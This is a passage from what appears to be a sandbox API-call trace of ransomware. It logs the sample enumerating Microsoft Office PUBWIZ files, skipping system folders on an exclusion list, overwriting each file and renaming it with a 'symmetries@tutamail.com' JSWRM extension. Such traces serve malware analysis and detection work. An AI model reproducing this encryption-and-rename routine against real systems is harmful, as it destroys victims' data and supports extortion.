office\\root\\office16\\pubwiz\\lthdhm.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0142.147] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=39578) returned 1 [0142.147] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.147] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x9a90, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x9a90, lpOverlapped=0x0) returned 1 [0142.151] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.151] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x9a90, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x9a90, lpOverlapped=0x0) returned 1 [0142.151] CloseHandle (hObject=0x238) returned 1 [0142.151] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\LTHDHM.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\lthdhm.poc"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\LTHDHM.POC.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\lthdhm.poc.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0142.152] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcc74eab3, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcc74eab3, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcc74eab3, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2694, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="MAIN.XML", cAlternateFileName="")) returned 1 [0142.152] lstrcmpiW (lpString1="MAIN.XML", lpString2=".") returned 1 [0142.152] lstrcmpiW (lpString1="MAIN.XML", lpString2="..") returned 1 [0142.152] lstrcmpiW (lpString1="MAIN.XML", lpString2="...") returned 1 [0142.152] lstrcmpiW (lpString1="MAIN.XML", lpString2="windows") returned -1 [0142.152] lstrcmpiW (lpString1="MAIN.XML", lpString2="recovery") returned -1 [0142.152] lstrcmpiW (lpString1="MAIN.XML", lpString2="perflogs") returned -1 [0142.152] lstrcmpiW (lpString1="MAIN.XML", lpString2="documents and settings") returned 1 [0142.152] lstrcmpiW (lpString1="MAIN.XML", lpString2="$RECYCLE.BIN") returned 1 [0142.152] lstrcmpiW (lpString1="MAIN.XML", lpString2="system volume information") returned -1 [0142.152] lstrcmpiW (lpString1="MAIN.XML", lpString2="msocache") returned -1 [0142.152] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MAIN.XML", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0142.153] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MAIN.XML", cchWideChar=8, lpMultiByteStr=0x345ebd8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MAIN.XML", lpUsedDefaultChar=0x0) returned 8 [0142.153] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MAIN.XML", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0142.153] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MAIN.XML", cchWideChar=8, lpMultiByteStr=0x345eba8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MAIN.XML", lpUsedDefaultChar=0x0) returned 8 [0142.153] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0142.153] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0142.153] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\MAIN.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\main.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0142.153] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=9876) returned 1 [0142.153] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.154] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x2690, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x2690, lpOverlapped=0x0) returned 1 [0142.187] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.187] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x2690, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x2690, lpOverlapped=0x0) returned 1 [0142.188] CloseHandle (hObject=0x238) returned 1 [0142.188] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\MAIN.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\main.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\MAIN.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\main.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0142.190] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x230ade29, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x230ade29, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x2327797c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xe56, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="MARQUEE.POC", cAlternateFileName="")) returned 1 [0142.190] lstrcmpiW (lpString1="MARQUEE.POC", lpString2=".") returned 1 [0142.190] lstrcmpiW (lpString1="MARQUEE.POC", lpString2="..") returned 1 [0142.190] lstrcmpiW (lpString1="MARQUEE.POC", lpString2="...") returned 1 [0142.190] lstrcmpiW (lpString1="MARQUEE.POC", lpString2="windows") returned -1 [0142.190] lstrcmpiW (lpString1="MARQUEE.POC", lpString2="recovery") returned -1 [0142.190] lstrcmpiW (lpString1="MARQUEE.POC", lpString2="perflogs") returned -1 [0142.190] lstrcmpiW (lpString1="MARQUEE.POC", lpString2="documents and settings") returned 1 [0142.190] lstrcmpiW (lpString1="MARQUEE.POC", lpString2="$RECYCLE.BIN") returned 1 [0142.190] lstrcmpiW (lpString1="MARQUEE.POC", lpString2="system volume information") returned -1 [0142.190] lstrcmpiW (lpString1="MARQUEE.POC", lpString2="msocache") returned -1 [0142.190] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MARQUEE.POC", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0142.190] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MARQUEE.POC", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MARQUEE.POC", lpUsedDefaultChar=0x0) returned 11 [0142.190] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MARQUEE.POC", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0142.190] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MARQUEE.POC", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MARQUEE.POC", lpUsedDefaultChar=0x0) returned 11 [0142.190] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0142.190] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0142.190] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\MARQUEE.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\marquee.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0142.191] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3670) returned 1 [0142.191] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.192] ReadFile (in: hFile=0x238, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0xe50, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e89c*=0xe50, lpOverlapped=0x0) returned 1 [0142.193] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.193] WriteFile (in: hFile=0x238, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0xe50, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e898*=0xe50, lpOverlapped=0x0) returned 1 [0142.193] CloseHandle (hObject=0x238) returned 1 [0142.193] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\MARQUEE.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\marquee.poc"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\MARQUEE.POC.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\marquee.poc.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0142.194] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x2303b5cd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x2303b5cd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x230ade29, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x14a14, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="MENU.DPV", cAlternateFileName="")) returned 1 [0142.194] lstrcmpiW (lpString1="MENU.DPV", lpString2=".") returned 1 [0142.194] lstrcmpiW (lpString1="MENU.DPV", lpString2="..") returned 1 [0142.194] lstrcmpiW (lpString1="MENU.DPV", lpString2="...") returned 1 [0142.194] lstrcmpiW (lpString1="MENU.DPV", lpString2="windows") returned -1 [0142.195] lstrcmpiW (lpString1="MENU.DPV", lpString2="recovery") returned -1 [0142.195] lstrcmpiW (lpString1="MENU.DPV", lpString2="perflogs") returned -1 [0142.195] lstrcmpiW (lpString1="MENU.DPV", lpString2="documents and settings") returned 1 [0142.195] lstrcmpiW (lpString1="MENU.DPV", lpString2="$RECYCLE.BIN") returned 1 [0142.195] lstrcmpiW (lpString1="MENU.DPV", lpString2="system volume information") returned -1 [0142.195] lstrcmpiW (lpString1="MENU.DPV", lpString2="msocache") returned -1 [0142.195] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MENU.DPV", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0142.195] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MENU.DPV", cchWideChar=8, lpMultiByteStr=0x345ebd8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MENU.DPV", lpUsedDefaultChar=0x0) returned 8 [0142.195] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MENU.DPV", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0142.195] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MENU.DPV", cchWideChar=8, lpMultiByteStr=0x345eba8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MENU.DPV", lpUsedDefaultChar=0x0) returned 8 [0142.195] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0142.195] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0142.195] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\MENU.DPV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\menu.dpv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0142.196] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=84500) returned 1 [0142.196] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.196] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x14a10, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x14a10, lpOverlapped=0x0) returned 1 [0142.203] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.203] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x14a10, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x14a10, lpOverlapped=0x0) returned 1 [0142.203] CloseHandle (hObject=0x238) returned 1 [0142.203] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\MENU.DPV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\menu.dpv"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\MENU.DPV.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\menu.dpv.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0142.204] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x2303b5cd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x2303b5cd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x2322b4da, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x138a, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="MENU.XML", cAlternateFileName="")) returned 1 [0142.204] lstrcmpiW (lpString1="MENU.XML", lpString2=".") returned 1 [0142.204] lstrcmpiW (lpString1="MENU.XML", lpString2="..") returned 1 [0142.204] lstrcmpiW (lpString1="MENU.XML", lpString2="...") returned 1 [0142.204] lstrcmpiW (lpString1="MENU.XML", lpString2="windows") returned -1 [0142.205] lstrcmpiW (lpString1="MENU.XML", lpString2="recovery") returned -1 [0142.205] lstrcmpiW (lpString1="MENU.XML", lpString2="perflogs") returned -1 [0142.205] lstrcmpiW (lpString1="MENU.XML", lpString2="documents and settings") returned 1 [0142.205] lstrcmpiW (lpString1="MENU.XML", lpString2="$RECYCLE.BIN") returned 1 [0142.205] lstrcmpiW (lpString1="MENU.XML", lpString2="system volume information") returned -1 [0142.205] lstrcmpiW (lpString1="MENU.XML", lpString2="msocache") returned -1 [0142.205] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MENU.XML", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0142.205] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MENU.XML", cchWideChar=8, lpMultiByteStr=0x345ebd8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MENU.XML", lpUsedDefaultChar=0x0) returned 8 [0142.205] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MENU.XML", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0142.205] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MENU.XML", cchWideChar=8, lpMultiByteStr=0x345eba8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MENU.XML", lpUsedDefaultChar=0x0) returned 8 [0142.205] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0142.205] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0142.205] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\MENU.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\menu.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0142.206] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=5002) returned 1 [0142.206] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.206] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x1380, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x1380, lpOverlapped=0x0) returned 1 [0142.207] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.208] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x1380, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x1380, lpOverlapped=0x0) returned 1 [0142.208] CloseHandle (hObject=0x238) returned 1 [0142.208] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\MENU.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\menu.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\MENU.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\menu.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0142.209] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x2335c7ca, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x2335c7ca, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x2335c7ca, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1fd7e, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="MENU98.POC", cAlternateFileName="")) returned 1 [0142.209] lstrcmpiW (lpString1="MENU98.POC", lpString2=".") returned 1 [0142.209] lstrcmpiW (lpString1="MENU98.POC", lpString2="..") returned 1 [0142.209] lstrcmpiW (lpString1="MENU98.POC", lpString2="...") returned 1 [0142.209] lstrcmpiW (lpString1="MENU98.POC", lpString2="windows") returned -1 [0142.209] lstrcmpiW (lpString1="MENU98.POC", lpString2="recovery") returned -1 [0142.209] lstrcmpiW (lpString1="MENU98.POC", lpString2="perflogs") returned -1 [0142.209] lstrcmpiW (lpString1="MENU98.POC", lpString2="documents and settings") returned 1 [0142.209] lstrcmpiW (lpString1="MENU98.POC", lpString2="$RECYCLE.BIN") returned 1 [0142.209] lstrcmpiW (lpString1="MENU98.POC", lpString2="system volume information") returned -1 [0142.209] lstrcmpiW (lpString1="MENU98.POC", lpString2="msocache") returned -1 [0142.209] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MENU98.POC", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0142.209] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MENU98.POC", cchWideChar=10, lpMultiByteStr=0x345ebd8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MENU98.POC", lpUsedDefaultChar=0x0) returned 10 [0142.209] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MENU98.POC", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0142.209] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MENU98.POC", cchWideChar=10, lpMultiByteStr=0x345eba8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MENU98.POC", lpUsedDefaultChar=0x0) returned 10 [0142.209] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0142.209] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0142.209] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\MENU98.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\menu98.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0142.211] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=130430) returned 1 [0142.211] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.211] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x1fd70, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x1fd70, lpOverlapped=0x0) returned 1 [0142.220] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.220] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x1fd70, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x1fd70, lpOverlapped=0x0) returned 1 [0142.221] CloseHandle (hObject=0x238) returned 1 [0142.221] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\MENU98.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\menu98.poc"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\MENU98.POC.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\menu98.poc.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0142.222] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x2303b5cd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x2303b5cd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x230ade29, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x208fa, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="MSTHED98.POC", cAlternateFileName="")) returned 1 [0142.222] lstrcmpiW 